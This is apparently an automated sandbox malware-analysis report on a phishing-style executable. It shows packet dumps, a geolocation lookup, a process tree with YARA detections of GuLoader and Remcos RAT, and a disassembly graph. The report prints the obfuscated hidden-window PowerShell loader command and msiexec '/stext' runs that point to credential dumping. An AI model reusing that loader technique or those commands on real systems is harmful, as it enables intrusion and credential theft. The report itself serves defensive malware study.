                                                                          Dec 10, 2024 13:52:56.350734949 CET1236INData Raw: dc 83 2b 89 da 45 bf d6 02 5b 67 5a a7 aa 05 cf 08 44 84 2a 5e 7f bd 31 c8 8b 51 2f b7 b3 66 80 18 80 9c ef a3 a6 d1 e8 c7 31 02 87 fd 07 b6 c6 c3 95 54 a5 10 57 78 79 0a f7 fa 68 95 28 66 bc f4 4b 2e d7 d6 fe 7a d6 b0 fa 8e 0b 8c d2 f0 b7 b1 72
                                                                          Data Ascii: +E[gZD*^1Q/f1TWxyh(fK.zrsY03o$GNEG H,lEp:oFD?7oHrBYvx]( zW_s)C\EAB82ee]_IKncbWi]@a8~cYy:l
                                                                          Dec 10, 2024 13:52:56.350748062 CET448INData Raw: 76 0e 9d 29 5c 8e 34 43 17 b7 a9 3c 33 92 1a 80 50 8e a5 2f 3a 63 91 75 52 1b 6f 84 ce a4 e4 d8 45 32 4f 33 f2 51 d2 e8 7c cc 4d c8 8b 9a 6d 20 87 d7 f1 61 d7 d4 e5 ac a0 d6 80 f3 d0 0d b5 ed 7e 65 ac 69 78 87 9c a9 82 0b a7 c0 b7 a9 8d 1a 1d b7
                                                                          Data Ascii: v)\4C<3P/:cuRoE2O3Q|Mm a~eixq9w)aYEd<2Hzi~<%|L{{/bxC`r:qN+p8LM-SBFWqpCM,[MJs~P\p"
                                                                          Dec 10, 2024 13:52:56.350837946 CET1236INData Raw: da c4 77 c7 9e 4b 15 1b 25 ef 55 b0 6a e7 9a 1f 76 dc 0f 9c 82 35 45 9d dd d7 ee 6d cb 67 c1 a1 1d 81 5e 28 c2 85 5c f0 21 fa 5a 07 11 36 ce c4 1b 6c cf 56 5d 33 82 17 d5 88 3d 9f 66 a3 60 51 8e b5 7b 2a 0c dc f9 44 62 86 32 85 86 b9 bf 38 86 a7
                                                                          Data Ascii: wK%Ujv5Emg^(\!Z6lV]3=f`Q{*Db2832]}(iT/{^`-ur!{IArSwAf"N\zw~B@@<Qenr@jYhh4+$iCnS{?ojh|JcT/-8q
                                                                          Dec 10, 2024 13:52:56.350850105 CET1236INData Raw: 9e c4 46 85 9a fb 79 db ee 74 f0 80 49 93 f3 60 86 c2 e6 52 40 e6 49 e3 e7 05 ca ec b8 60 a2 2e 0f 8f 99 d4 4d a5 06 b1 de 9e d8 91 81 29 5a 42 67 3f c2 70 7a a7 f2 a2 20 36 76 bb 87 3a 15 72 65 3a d4 67 84 ac ae d0 bf 03 6a 9e b4 2a 6a 8d 74 50
                                                                          Data Ascii: FytI`R@I`.M)ZBg?pz 6v:re:gj*jtP9Xx/qlbY_>^que9iP2 Ku[l!?u<q{hH+&O^.NjX'&gJj~tvx/Q('D ]afO
                                                                          Dec 10, 2024 13:52:56.431345940 CET1236INData Raw: 3f a5 ed f1 4f f1 a6 07 41 c8 8b 33 23 2e 3e 7b 06 95 73 0d 50 01 c0 c6 c2 7a ee 7f 53 d7 5d 4a 5f 2e b5 10 9a 27 ad 58 4e 13 1b 22 ec 2f ba 63 7b ab 8a 82 95 a0 f2 34 a8 dd 20 15 03 cf d7 08 24 c6 43 12 cb dc 20 e8 56 5c f1 67 19 0f 1a f9 8a e4
                                                                          Data Ascii: ?OA3#.>{sPzS]J_.'XN"/c{4 $C V\g}ivHOIh^4bVy@UV8E1?v,zitI/9gw)V\F[P^L*.|t76Slk`l(*JoQ._/zd\F(F


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.549940178.237.33.50805752C:\Windows\SysWOW64\msiexec.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 10, 2024 13:53:00.931035995 CET71OUTGET /json.gp HTTP/1.1
                                                                          Host: geoplugin.net
                                                                          Cache-Control: no-cache
                                                                          Dec 10, 2024 13:53:02.178631067 CET1171INHTTP/1.1 200 OK
                                                                          date: Tue, 10 Dec 2024 12:53:01 GMT
                                                                          server: Apache
                                                                          content-length: 963
                                                                          content-type: application/json; charset=utf-8
                                                                          cache-control: public, max-age=300
                                                                          access-control-allow-origin: *
                                                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                          Data Ascii: { "geoplugin_request":"8.46.123.175", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:07:50:54
                                                                          Start date:10/12/2024
                                                                          Path:C:\Users\user\Desktop\order CF08093-24.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\order CF08093-24.exe"
                                                                          Imagebase:0x400000
                                                                          File size:794'991 bytes
                                                                          MD5 hash:19C071AE3E499DF299092283E301B7A2
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:07:50:55
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25)
                                                                          Imagebase:0x410000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.3123794249.000000000A6AE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:3
                                                                          Start time:07:50:55
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:6
                                                                          Start time:07:52:45
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                          Imagebase:0x650000
                                                                          File size:59'904 bytes
                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.3278532416.0000000007B2A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.3298978061.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.3298626109.0000000007B37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4486408121.000000002340F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4475133406.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000003.3275406324.0000000007B2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:7
                                                                          Start time:07:53:02
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"
                                                                          Imagebase:0x650000
                                                                          File size:59'904 bytes
                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:8
                                                                          Start time:07:53:02
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"
                                                                          Imagebase:0x650000
                                                                          File size:59'904 bytes
                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:9
                                                                          Start time:07:53:02
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"
                                                                          Imagebase:0x650000
                                                                          File size:59'904 bytes
                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:10
                                                                          Start time:07:53:02
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"
                                                                          Imagebase:0x650000
                                                                          File size:59'904 bytes
                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:11
                                                                          Start time:07:53:02
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\aczzpbalucdoyblxcfryerxbbswqyinsk"
                                                                          Imagebase:0x650000
                                                                          File size:59'904 bytes
                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:12
                                                                          Start time:07:53:02
                                                                          Start date:10/12/2024
                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dwmsp"
                                                                          Imagebase:0x650000
                                                                          File size:59'904 bytes
                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:19%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:17%
                                                                            Total number of Nodes:1371
                                                                            Total number of Limit Nodes:24
                                                                            execution_graph 3236 401bc0 3237 401c11 3236->3237 3243 401bcd 3236->3243 3239 401c16 3237->3239 3240 401c3b GlobalAlloc 3237->3240 3238 4023af 3242 40657e 21 API calls 3238->3242 3250 401c56 3239->3250 3274 406541 lstrcpynW 3239->3274 3255 40657e 3240->3255 3245 4023bc 3242->3245 3243->3238 3246 401be4 3243->3246 3275 405ba1 3245->3275 3272 406541 lstrcpynW 3246->3272 3247 401c28 GlobalFree 3247->3250 3251 401bf3 3273 406541 lstrcpynW 3251->3273 3253 401c02 3279 406541 lstrcpynW 3253->3279 3270 406589 3255->3270 3256 4067d0 3257 4067e9 3256->3257 3302 406541 lstrcpynW 3256->3302 3257->3250 3259 4067a1 lstrlenW 3259->3270 3263 40669a GetSystemDirectoryW 3263->3270 3264 40657e 15 API calls 3264->3259 3265 4066b0 GetWindowsDirectoryW 3265->3270 3266 406742 lstrcatW 3266->3270 3268 40657e 15 API calls 3268->3270 3270->3256 3270->3259 3270->3263 3270->3264 3270->3265 3270->3266 3270->3268 3271 406712 SHGetPathFromIDListW CoTaskMemFree 3270->3271 3280 40640f 3270->3280 3285 406935 GetModuleHandleA 3270->3285 3291 4067ef 3270->3291 3300 406488 wsprintfW 3270->3300 3301 406541 lstrcpynW 3270->3301 3271->3270 3272->3251 3273->3253 3274->3247 3276 405bb6 3275->3276 3277 405c02 3276->3277 3278 405bca MessageBoxIndirectW 3276->3278 3277->3250 3278->3277 3279->3250 3303 4063ae 3280->3303 3283 406443 RegQueryValueExW RegCloseKey 3284 406473 3283->3284 3284->3270 3286 406951 3285->3286 3287 40695b GetProcAddress 3285->3287 3307 4068c5 GetSystemDirectoryW 3286->3307 3289 40696a 3287->3289 3289->3270 3290 406957 3290->3287 3290->3289 3292 4067fc 3291->3292 3294 406865 CharNextW 3292->3294 3295 406872 3292->3295 3298 406851 CharNextW 3292->3298 3299 406860 CharNextW 3292->3299 3310 405e3d 3292->3310 3293 406877 CharPrevW 3293->3295 3294->3292 3294->3295 3295->3293 3296 406898 3295->3296 3296->3270 3298->3292 3299->3294 3300->3270 3301->3270 3302->3257 3304 4063bd 3303->3304 3305 4063c6 RegOpenKeyExW 3304->3305 3306 4063c1 3304->3306 3305->3306 3306->3283 3306->3284 3308 4068e7 wsprintfW LoadLibraryExW 3307->3308 3308->3290 3311 405e43 3310->3311 3312 405e59 3311->3312 3313 405e4a CharNextW 3311->3313 3312->3292 3313->3311 3314 403fc1 3315 403fd9 3314->3315 3316 40413a 3314->3316 3315->3316 3317 403fe5 3315->3317 3318 40418b 3316->3318 3319 40414b GetDlgItem GetDlgItem 3316->3319 3320 403ff0 SetWindowPos 3317->3320 3321 404003 3317->3321 3323 4041e5 3318->3323 3334 401389 2 API calls 3318->3334 3322 4044c0 22 API calls 3319->3322 3320->3321 3325 40400c ShowWindow 3321->3325 3326 40404e 3321->3326 3327 404175 SetClassLongW 3322->3327 3328 404135 3323->3328 3387 40450c 3323->3387 3329 404127 3325->3329 3330 40402c GetWindowLongW 3325->3330 3331 404056 DestroyWindow 3326->3331 3332 40406d 3326->3332 3333 40140b 2 API calls 3327->3333 3409 404527 3329->3409 3330->3329 3336 404045 ShowWindow 3330->3336 3386 404449 3331->3386 3337 404072 SetWindowLongW 3332->3337 3338 404083 3332->3338 3333->3318 3339 4041bd 3334->3339 3336->3326 3337->3328 3338->3329 3342 40408f GetDlgItem 3338->3342 3339->3323 3343 4041c1 SendMessageW 3339->3343 3340 40140b 2 API calls 3356 4041f7 3340->3356 3341 40444b DestroyWindow EndDialog 3341->3386 3345 4040a0 SendMessageW IsWindowEnabled 3342->3345 3346 4040bd 3342->3346 3343->3328 3344 40447a ShowWindow 3344->3328 3345->3328 3345->3346 3348 4040ca 3346->3348 3349 404111 SendMessageW 3346->3349 3350 4040dd 3346->3350 3359 4040c2 3346->3359 3347 40657e 21 API calls 3347->3356 3348->3349 3348->3359 3349->3329 3353 4040e5 3350->3353 3354 4040fa 3350->3354 3352 4044c0 22 API calls 3352->3356 3403 40140b 3353->3403 3358 40140b 2 API calls 3354->3358 3355 4040f8 3355->3329 3356->3328 3356->3340 3356->3341 3356->3347 3356->3352 3377 40438b DestroyWindow 3356->3377 3390 4044c0 3356->3390 3360 404101 3358->3360 3406 404499 3359->3406 3360->3329 3360->3359 3362 404272 GetDlgItem 3363 404287 3362->3363 3364 40428f ShowWindow KiUserCallbackDispatcher 3362->3364 3363->3364 3393 4044e2 KiUserCallbackDispatcher 3364->3393 3366 4042b9 EnableWindow 3371 4042cd 3366->3371 3367 4042d2 GetSystemMenu EnableMenuItem SendMessageW 3368 404302 SendMessageW 3367->3368 3367->3371 3368->3371 3371->3367 3394 4044f5 SendMessageW 3371->3394 3395 403fa2 3371->3395 3398 406541 lstrcpynW 3371->3398 3373 404331 lstrlenW 3374 40657e 21 API calls 3373->3374 3375 404347 SetWindowTextW 3374->3375 3399 401389 3375->3399 3378 4043a5 CreateDialogParamW 3377->3378 3377->3386 3379 4043d8 3378->3379 3378->3386 3380 4044c0 22 API calls 3379->3380 3381 4043e3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3380->3381 3382 401389 2 API calls 3381->3382 3383 404429 3382->3383 3383->3328 3384 404431 ShowWindow 3383->3384 3385 40450c SendMessageW 3384->3385 3385->3386 3386->3328 3386->3344 3388 404524 3387->3388 3389 404515 SendMessageW 3387->3389 3388->3356 3389->3388 3391 40657e 21 API calls 3390->3391 3392 4044cb SetDlgItemTextW 3391->3392 3392->3362 3393->3366 3394->3371 3396 40657e 21 API calls 3395->3396 3397 403fb0 SetWindowTextW 3396->3397 3397->3371 3398->3373 3401 401390 3399->3401 3400 4013fe 3400->3356 3401->3400 3402 4013cb MulDiv SendMessageW 3401->3402 3402->3401 3404 401389 2 API calls 3403->3404 3405 401420 3404->3405 3405->3359 3407 4044a0 3406->3407 3408 4044a6 SendMessageW 3406->3408 3407->3408 3408->3355 3410 4045ea 3409->3410 3411 40453f GetWindowLongW 3409->3411 3410->3328 3411->3410 3412 404554 3411->3412 3412->3410 3413 404581 GetSysColor 3412->3413 3414 404584 3412->3414 3413->3414 3415 404594 SetBkMode 3414->3415 3416 40458a SetTextColor 3414->3416 3417 4045b2 3415->3417 3418 4045ac GetSysColor 3415->3418 3416->3415 3419 4045c3 3417->3419 3420 4045b9 SetBkColor 3417->3420 3418->3417 3419->3410 3421 4045d6 DeleteObject 3419->3421 3422 4045dd CreateBrushIndirect 3419->3422 3420->3419 3421->3422 3422->3410 4027 402641 4028 402dcb 21 API calls 4027->4028 4029 402648 4028->4029 4032 406031 GetFileAttributesW CreateFileW 4029->4032 4031 402654 4032->4031 4040 4025c3 4050 402e0b 4040->4050 4043 402da9 21 API calls 4044 4025d6 4043->4044 4045 4025f2 RegEnumKeyW 4044->4045 4046 4025fe RegEnumValueW 4044->4046 4048 402953 4044->4048 4047 402613 RegCloseKey 4045->4047 4046->4047 4047->4048 4051 402dcb 21 API calls 4050->4051 4052 402e22 4051->4052 4053 4063ae RegOpenKeyExW 4052->4053 4054 4025cd 4053->4054 4054->4043 3631 4015c8 3632 402dcb 21 API calls 3631->3632 3633 4015cf SetFileAttributesW 3632->3633 3634 4015e1 3633->3634 3640 401fc9 3641 402dcb 21 API calls 3640->3641 3642 401fcf 3641->3642 3643 4055c6 28 API calls 3642->3643 3644 401fd9 3643->3644 3655 405b24 CreateProcessW 3644->3655 3647 402002 CloseHandle 3651 402953 3647->3651 3650 401ff4 3652 402004 3650->3652 3653 401ff9 3650->3653 3652->3647 3663 406488 wsprintfW 3653->3663 3656 401fdf 3655->3656 3657 405b57 CloseHandle 3655->3657 3656->3647 3656->3651 3658 4069e0 WaitForSingleObject 3656->3658 3657->3656 3659 4069fa 3658->3659 3660 406a0c GetExitCodeProcess 3659->3660 3664 406971 3659->3664 3660->3650 3663->3647 3665 40698e PeekMessageW 3664->3665 3666 406984 DispatchMessageW 3665->3666 3667 40699e WaitForSingleObject 3665->3667 3666->3665 3667->3659 4058 40204f 4059 402dcb 21 API calls 4058->4059 4060 402056 4059->4060 4061 406935 5 API calls 4060->4061 4062 402065 4061->4062 4063 402081 GlobalAlloc 4062->4063 4064 4020f1 4062->4064 4063->4064 4065 402095 4063->4065 4066 406935 5 API calls 4065->4066 4067 40209c 4066->4067 4068 406935 5 API calls 4067->4068 4069 4020a6 4068->4069 4069->4064 4073 406488 wsprintfW 4069->4073 4071 4020df 4074 406488 wsprintfW 4071->4074 4073->4071 4074->4064 4075 40254f 4076 402e0b 21 API calls 4075->4076 4077 402559 4076->4077 4078 402dcb 21 API calls 4077->4078 4079 402562 4078->4079 4080 40256d RegQueryValueExW 4079->4080 4085 402953 4079->4085 4081 402593 RegCloseKey 4080->4081 4082 40258d 4080->4082 4081->4085 4082->4081 4086 406488 wsprintfW 4082->4086 4086->4081 4087 4021cf 4088 402dcb 21 API calls 4087->4088 4089 4021d6 4088->4089 4090 402dcb 21 API calls 4089->4090 4091 4021e0 4090->4091 4092 402dcb 21 API calls 4091->4092 4093 4021ea 4092->4093 4094 402dcb 21 API calls 4093->4094 4095 4021f4 4094->4095 4096 402dcb 21 API calls 4095->4096 4097 4021fe 4096->4097 4098 40223d CoCreateInstance 4097->4098 4099 402dcb 21 API calls 4097->4099 4102 40225c 4098->4102 4099->4098 4100 401423 28 API calls 4101 40231b 4100->4101 4102->4100 4102->4101 4103 403bd1 4104 403bdc 4103->4104 4105 403be3 GlobalAlloc 4104->4105 4106 403be0 4104->4106 4105->4106 4114 401a55 4115 402dcb 21 API calls 4114->4115 4116 401a5e ExpandEnvironmentStringsW 4115->4116 4117 401a72 4116->4117 4118 401a85 4116->4118 4117->4118 4119 401a77 lstrcmpW 4117->4119 4119->4118 4120 4014d7 4121 402da9 21 API calls 4120->4121 4122 4014dd Sleep 4121->4122 4124 402c4f 4122->4124 4130 4023d7 4131 4023df 4130->4131 4134 4023e5 4130->4134 4132 402dcb 21 API calls 4131->4132 4132->4134 4133 4023f3 4136 402401 4133->4136 4137 402dcb 21 API calls 4133->4137 4134->4133 4135 402dcb 21 API calls 4134->4135 4135->4133 4138 402dcb 21 API calls 4136->4138 4137->4136 4139 40240a WritePrivateProfileStringW 4138->4139 4140 402459 4141 402461 4140->4141 4142 40248c 4140->4142 4143 402e0b 21 API calls 4141->4143 4144 402dcb 21 API calls 4142->4144 4145 402468 4143->4145 4146 402493 4144->4146 4148 402dcb 21 API calls 4145->4148 4150 4024a0 4145->4150 4151 402e89 4146->4151 4149 402479 RegDeleteValueW RegCloseKey 4148->4149 4149->4150 4152 402e9d 4151->4152 4153 402e96 4151->4153 4152->4153 4155 402ece 4152->4155 4153->4150 4156 4063ae RegOpenKeyExW 4155->4156 4158 402efc 4156->4158 4157 402fa6 4157->4153 4158->4157 4159 402f0c RegEnumValueW 4158->4159 4163 402f2f 4158->4163 4160 402f96 RegCloseKey 4159->4160 4159->4163 4160->4157 4161 402f6b RegEnumKeyW 4162 402f74 RegCloseKey 4161->4162 4161->4163 4164 406935 5 API calls 4162->4164 4163->4160 4163->4161 4163->4162 4165 402ece 6 API calls 4163->4165 4166 402f84 4164->4166 4165->4163 4166->4157 4167 402f88 RegDeleteKeyW 4166->4167 4167->4157 4168 40175a 4169 402dcb 21 API calls 4168->4169 4170 401761 SearchPathW 4169->4170 4171 40177c 4170->4171 4172 401d5d 4173 402da9 21 API calls 4172->4173 4174 401d64 4173->4174 4175 402da9 21 API calls 4174->4175 4176 401d70 GetDlgItem 4175->4176 4177 40265d 4176->4177 4178 406c5f 4184 406ae3 4178->4184 4179 40744e 4180 406b64 GlobalFree 4181 406b6d GlobalAlloc 4180->4181 4181->4179 4181->4184 4182 406be4 GlobalAlloc 4182->4179 4182->4184 4183 406bdb GlobalFree 4183->4182 4184->4179 4184->4180 4184->4181 4184->4182 4184->4183 4185 402663 4186 402692 4185->4186 4187 402677 4185->4187 4189 4026c2 4186->4189 4190 402697 4186->4190 4188 402da9 21 API calls 4187->4188 4199 40267e 4188->4199 4192 402dcb 21 API calls 4189->4192 4191 402dcb 21 API calls 4190->4191 4193 40269e 4191->4193 4194 4026c9 lstrlenW 4192->4194 4202 406563 WideCharToMultiByte 4193->4202 4194->4199 4196 4026b2 lstrlenA 4196->4199 4197 4026f6 4198 40270c 4197->4198 4200 4060e3 WriteFile 4197->4200 4199->4197 4199->4198 4203 406112 SetFilePointer 4199->4203 4200->4198 4202->4196 4204 40612e 4203->4204 4205 406146 4203->4205 4206 4060b4 ReadFile 4204->4206 4205->4197 4207 40613a 4206->4207 4207->4205 4208 406177 SetFilePointer 4207->4208 4209 40614f SetFilePointer 4207->4209 4208->4205 4209->4208 4210 40615a 4209->4210 4211 4060e3 WriteFile 4210->4211 4211->4205 3592 4015e6 3593 402dcb 21 API calls 3592->3593 3594 4015ed 3593->3594 3612 405ebb CharNextW CharNextW 3594->3612 3596 401656 3598 401688 3596->3598 3599 40165b 3596->3599 3597 405e3d CharNextW 3605 4015f6 3597->3605 3602 401423 28 API calls 3598->3602 3618 401423 3599->3618 3609 401680 3602->3609 3605->3596 3605->3597 3608 40163c GetFileAttributesW 3605->3608 3610 40161f 3605->3610 3622 405b0c 3605->3622 3628 405aef CreateDirectoryW 3605->3628 3607 40166f SetCurrentDirectoryW 3607->3609 3608->3605 3610->3605 3625 405a95 CreateDirectoryW 3610->3625 3613 405ed8 3612->3613 3615 405eea 3612->3615 3614 405ee5 CharNextW 3613->3614 3613->3615 3617 405f0e 3614->3617 3616 405e3d CharNextW 3615->3616 3615->3617 3616->3615 3617->3605 3619 4055c6 28 API calls 3618->3619 3620 401431 3619->3620 3621 406541 lstrcpynW 3620->3621 3621->3607 3623 406935 5 API calls 3622->3623 3624 405b13 3623->3624 3624->3605 3626 405ae1 3625->3626 3627 405ae5 GetLastError 3625->3627 3626->3610 3627->3626 3629 405b03 GetLastError 3628->3629 3630 405aff 3628->3630 3629->3630 3630->3605 4218 401c68 4219 402da9 21 API calls 4218->4219 4220 401c6f 4219->4220 4221 402da9 21 API calls 4220->4221 4222 401c7c 4221->4222 4223 401c91 4222->4223 4224 402dcb 21 API calls 4222->4224 4225 401ca1 4223->4225 4226 402dcb 21 API calls 4223->4226 4224->4223 4227 401cf8 4225->4227 4228 401cac 4225->4228 4226->4225 4229 402dcb 21 API calls 4227->4229 4230 402da9 21 API calls 4228->4230 4232 401cfd 4229->4232 4231 401cb1 4230->4231 4233 402da9 21 API calls 4231->4233 4234 402dcb 21 API calls 4232->4234 4235 401cbd 4233->4235 4236 401d06 FindWindowExW 4234->4236 4237 401ce8 SendMessageW 